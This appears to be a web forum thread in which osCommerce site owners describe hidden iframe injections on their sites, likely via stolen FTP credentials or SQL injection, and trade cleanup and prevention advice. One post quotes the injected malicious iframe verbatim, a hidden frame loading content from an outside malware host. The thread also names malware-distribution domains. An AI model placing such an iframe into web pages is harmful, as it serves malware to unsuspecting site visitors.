Hi
I just found out (from customers and google) that our site was infected with inserted hidden iframes that linked to other sites.
Our site is a full osCommerce site.
It started yesterday, and at the same day, there was an purchase of some products, where the customername etc. just was “asaaasasd” etc.
I have removed all wrong iframe tags in my files, but I would like to know how I could prevent this to happen again in the future, and how it could happen !?
Thanks!
Oh sorry.
Here is the report:
http://www.google.com/safebrowsing/diagnostic?site=www.ribezoocenter.dk
Malicious software is hosted on 2 domain(s), including durnosy.com/, openstats.info/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including durnosy.com/.
The durnosy and openstats.info infections have usually been the result of compromised FTP credentials.
Here’s what we recommend:
1. Scan all PCs that have FTP access to your site with either AVG, Avast or Avira. These have been found to work best at cleaning this virus. For some reason, Norton has not been very successful at detecting or removing this virus.
2. Change your FTP password. This virus steals your FTP credentials either by searching your files for the stored username and password in the FTP software used or by sniffing the FTP traffic for username and password. Since FTP transmits in plain text, it’s easy to do.
3. Find out from your hosting provider how you can move away from FTP and move toward using either SFTP or FTPS for file transfers. These 2 protocols encrypt all transmissions so it’s much more difficult (some say impossible) to sniff the traffic.
Then when you upload files to your site, you should be good – after you’ve cleaned them. But typically, you won’t find the infectious files on your PC, they’re changed on your website.
Let the forum here know of your results or questions so that others may learn from your experience.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
I have scanned all computers with FTP access with no results. (With AVG and Kaspersky)
I just talked with our host, and they told they have seen similair problems on other servers with php5 and mysql5. No they will move us to a php5 and mysql5 server.
I have removed all tags in my files, should I look out after other things?
My host talked about a SQL-injection that could course this matter. (Wich match up with the custumers named “asdasdasda” etc.)
hi,
I m new to the forum, however, I had the same issue before 2 days. I again did the same thing.. I removed the Code, uninstall the cute FTP,
scan the pc..
Its done for now but i am not sure if it will not come again.
I am looking for the male ware/bad ware or spyware name, this is very important in order to stop it coming next time.
I cant trust cute ftp now and i m looking for SFTP installed to upload. Any help will be greatly appreciated.
Thanks in advance.
Hi all,
I faced the same issue before 2 days. I am using CuteFtp PRO and my 3 sites index pages were infected with following code.
<iframe src=“http://a5f.ru:8080/ts/in.cgi?pepsi93” width=125 height=125 style=“visibility: hidden”>
Thankfully I found it and scanned my entire server with that code. I found 3 locations, where I edited the things.
Also, I updated the FTP password, scanned my pc, uninstall Cute FTP.
I am looking for the name of the Bad ware/Male ware/Spy ware which caused this. If any one knows the name of exact reason why it came and by which anti spy ware it was removed?
Please if any one has any details; pass it so that we can apply in our machines. Thanks very much in advance.
Sam
